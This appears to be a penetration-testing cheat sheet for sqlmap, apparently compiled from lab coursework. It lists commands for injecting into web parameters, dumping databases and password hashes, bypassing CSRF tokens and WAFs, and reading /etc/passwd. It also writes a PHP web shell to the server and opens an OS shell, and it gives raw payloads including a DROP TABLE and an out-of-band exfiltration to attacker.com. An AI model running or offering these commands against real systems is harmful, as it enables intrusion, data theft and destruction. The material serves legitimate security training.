SQLMAP
GET Request
python sqlmap.py -u 'http://inlanefreight.htb/page.php?id=5'
sqlmap -u "http://www.example.com/vuln.php?id=1" --batch

sqlmap 'http://www.example.com/?id=1' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) Gecko/20100101 Firefox/80.0' -H 'Accept: image/webp,*/*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Connection: keep-alive' -H 'DNT: 1'
POST Request
sqlmap 'http://www.example.com/' --data 'uid=1&name=test'
sqlmap 'http://www.example.com/' --data 'uid=1*&name=test'
Full Request
sqlmap -r req.txt
Cookies
sqlmap ... --cookie='PHPSESSID=ab4530f4a7d10448457fa8b0eadac29c'
sqlmap ... -H='Cookie:PHPSESSID=ab4530f4a7d10448457fa8b0eadac29c'
HTTP Headers
We can apply the same to options like --host
, --referer
, and -A/--user-agent
, which are used to specify the same HTTP headers' values.
--random-agent
: randomly select a User-agent
header value.
While SQLMap, by default, targets only the HTTP parameters, it is possible to test the headers for the SQLi vulnerability. The easiest way is to specify the "custom" injection mark after the header's value (e.g. --cookie="id=1*"
). The same principle applies to any other part of the request.
PUT Request
sqlmap -u www.target.com --data='id=1' --method PUT
Dump Databases
--dump
automatically dump all data.
--dump-all --exclude-sysdbs
Display Errors
--parse-errors
Verbose Output
sqlmap -u "http://www.target.com/vuln.php?id=1" -v 6 --batch
Using Proxy
--proxy
option to redirect the whole traffic through a (MiTM) proxy (e.g., Burp
)
Prefix/Suffix
There is a requirement for special prefix and suffix values in rare cases, not covered by the regular SQLMap run. For such runs, options --prefix
and --suffix
can be used.
$query = "SELECT id,name,surname FROM users WHERE id LIKE (('" . $_GET["q"] . "')) LIMIT 0,1";
$result = mysqli_query($link, $query);
sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -"
sqlmap http://IP:PORT/test.php?col=id --random-agent --batch --dump --prefix='`)' --level=5 --risk=3
Level/Risk
sqlmap -u www.example.com/?id=1 -v 3 --level=5
--level
(1-5
, default 1
)
--risk
(1-3
, default 1
)
sqlmap -u www.example.com/?id=1 --level=5 --risk=3
Advanced Tuning
Status Codes
For example, when dealing with a huge target response with a lot of dynamic content, subtle differences between TRUE
and FALSE
responses could be used for detection purposes. If the difference between TRUE
and FALSE
responses can be seen in the HTTP codes (e.g. 200
for TRUE
and 500
for FALSE
), the option --code
could be used to fixate the detection of TRUE
responses to a specific HTTP code (e.g. --code=200
).
Titles
If the difference between responses can be seen by inspecting the HTTP page titles, the switch --titles
could be used to instruct the detection mechanism to base the comparison based on the content of the HTML tag <title>
.
Strings
In case of a specific string value appearing in TRUE
responses (e.g. success
), while absent in FALSE
responses, the option --string
could be used to fixate the detection based only on the appearance of that single value (e.g. --string=success
).
Text-only
When dealing with a lot of hidden content, such as certain HTML page behaviors tags (e.g. <script>
, <style>
, <meta>
, etc.), we can use the --text-only
switch, which removes all the HTML tags, and bases the comparison only on the textual (i.e., visible) content.
Techniques
For example, if we want to skip the time-based blind and stacking SQLi payloads and only test for the boolean-based blind, error-based, and UNION-query payloads, we can specify these techniques with --technique=BEU
.
UNION SQLi Tuning
In some cases, UNION
SQLi payloads require extra user-provided information to work. If we can manually find the exact number of columns of the vulnerable SQL query, we can provide this number to SQLMap with the option --union-cols
(e.g. --union-cols=17
). In case that the default "dummy" filling values used by SQLMap -NULL
and random integer- are not compatible with values from results of the vulnerable SQL query, we can specify an alternative value instead (e.g. --union-char='a'
).
Furthermore, in case there is a requirement to use an appendix at the end of a UNION
query in the form of the FROM <table>
(e.g., in case of Oracle), we can set it with the option --union-from
(e.g. --union-from=users
).

5 columns => sqlmap http://83.136.251.226:45849/case7.php?id=1 --union-cols=5
Basic DB Data Enumeration
hostname of the vulnerable target (
--hostname
),current user's name (
--current-user
),current database name (
--current-db
),password hashes (
--passwords
).
SQLMap will skip SQLi detection if it has been identified earlier and directly start the DBMS enumeration process.
Enumeration usually starts with the retrieval of the basic information:
Database version banner (switch
--banner
)Current user name (switch
--current-user
)Current database name (switch
--current-db
)Checking if the current user has DBA (administrator) rights.
sqlmap -u "http://www.example.com/?id=1" --banner --current-user --current-db --is-dba
Table Enumeration
sqlmap -u "http://www.example.com/?id=1" --tables -D testdb
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb -C name,surname
...SNIP...
Database: testdb
Table: users
[4 entries]
+--------+------------+
| name | surname |
+--------+------------+
| luther | blisset |
| fluffy | bunny |
| wu | ming |
| NULL | nameisnull |
+--------+------------+
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --start=2 --stop=3
...SNIP...
Database: testdb
Table: users
[2 entries]
+----+--------+---------+
| id | name | surname |
+----+--------+---------+
| 2 | fluffy | bunny |
| 3 | wu | ming |
+----+--------+---------+
Conditional Enumeration
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --where="name LIKE 'f%'"
...SNIP...
Database: testdb
Table: users
[1 entry]
+----+--------+---------+
| id | name | surname |
+----+--------+---------+
| 2 | fluffy | bunny |
DB Schema Enumeration
sqlmap -u "http://www.example.com/?id=1" --schema
Searching for Data
Search Tables
sqlmap -u "http://www.example.com/?id=1" --search -T user
Search Columns
sqlmap -u "http://www.example.com/?id=1" --search -C pass
DB Users Password Enumeration and Cracking
Content of system tables containing database-specific credentials (e.g., connection credentials)
sqlmap -u "http://www.example.com/?id=1" --passwords --batch
Bypass
Anti-CSRF Token Bypass
sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token"
Unique Value Bypass
sqlmap -u "http://www.example.com/?id=1&rp=29125" --randomize=rp --batch -v 5
Calculated Parameter Bypass
the option --eval
should be used, where a valid Python code is being evaluated just before the request is being sent to the target
sqlmap -u "http://www.example.com/?id=1&h=c4ca4238a0b923820dcc509a6f75849b" --eval="import hashlib; h=hashlib.md5(id).hexdigest()" --batch -v 5
WAF Bypass
User-agent Blacklisting Bypass
--random-agent
Tamper Scripts
To get a whole list of implemented tamper scripts, along with the description as above, switch --list-tampers
can be used
Tamper-Script
Description
0eunion
Replaces instances of UNION with e0UNION
base64encode
Base64-encodes all characters in a given payload
between
Replaces greater than operator (>
) with NOT BETWEEN 0 AND #
and equals operator (=
) with BETWEEN # AND #
commalesslimit
Replaces (MySQL) instances like LIMIT M, N
with LIMIT N OFFSET M
counterpart
equaltolike
Replaces all occurrences of operator equal (=
) with LIKE
counterpart
halfversionedmorekeywords
Adds (MySQL) versioned comment before each keyword
modsecurityversioned
Embraces complete query with (MySQL) versioned comment
modsecurityzeroversioned
Embraces complete query with (MySQL) zero-versioned comment
percentage
Adds a percentage sign (%
) in front of each character (e.g. SELECT -> %S%E%L%E%C%T)
plus2concat
Replaces plus operator (+
) with (MsSQL) function CONCAT() counterpart
randomcase
Replaces each keyword character with random case value (e.g. SELECT -> SEleCt)
space2comment
Replaces space character ( ) with comments `/
space2dash
Replaces space character ( ) with a dash comment (--
) followed by a random string and a new line ()
space2hash
Replaces (MySQL) instances of space character ( ) with a pound character (#
) followed by a random string and a new line ()
space2mssqlblank
Replaces (MsSQL) instances of space character ( ) with a random blank character from a valid set of alternate characters
space2plus
Replaces space character ( ) with plus (+
)
space2randomblank
Replaces space character ( ) with a random blank character from a valid set of alternate characters
symboliclogical
Replaces AND and OR logical operators with their symbolic counterparts (&&
and |
)
versionedkeywords
Encloses each non-function keyword with (MySQL) versioned comment
versionedmorekeywords
Encloses each keyword with (MySQL) versioned comment
All in one
`sqlmap -r req.txt --level=5 --risk=3 --dbms="mysql" --dbs --tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,percentage,randomcase,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor -p search`
Miscellaneous Bypasses
--chunked
splits the POST request's body into so-called "chunks." Blacklisted SQL keywords are split between chunks in a way that the request containing them can pass unnoticed
HTTP parameter pollution
(HPP
), where payloads are split in a similar way as in case of --chunked
between different same parameter named values (e.g. ?id=1&id=UNION&id=SELECT&id=username,password&id=FROM&id=users...
), which are concatenated by the target platform if supporting it (e.g. ASP
)
OS Exploitation
File Read/Write
Is DBA ?
sqlmap -u "http://www.example.com/case1.php?id=1" --is-dba
Read File
sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd"
Write File
echo '<?php system($_GET["cmd"]); ?>' > shell.php
sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"
curl http://www.example.com/shell.php?cmd=ls+-la
OS Command Execution
sqlmap -u "http://www.example.com/?id=1" --os-shell
sqlmap -u "http://www.example.com/?id=1" --os-shell --technique=E
Techniques
The technique characters BEUSTQ
refers to the following:
B
: Boolean-based blindE
: Error-basedU
: Union query-basedS
: Stacked queriesT
: Time-based blindQ
: Inline queries
Boolean-based blind SQL Injection
AND 1=1
Error-based SQL Injection
AND GTID_SUBSET(@@version,0)
UNION query-based
UNION ALL SELECT 1,@@version,3
Stacked queries
; DROP TABLE users
Time-based blind SQL Injection
AND 1=IF(2>1,SLEEP(5),0)
Inline queries
SELECT (SELECT @@version) from
Out-of-band SQL Injection
LOAD_FILE(CONCAT('\\\\',@@version,'.attacker.com\\README.txt'))
Last updated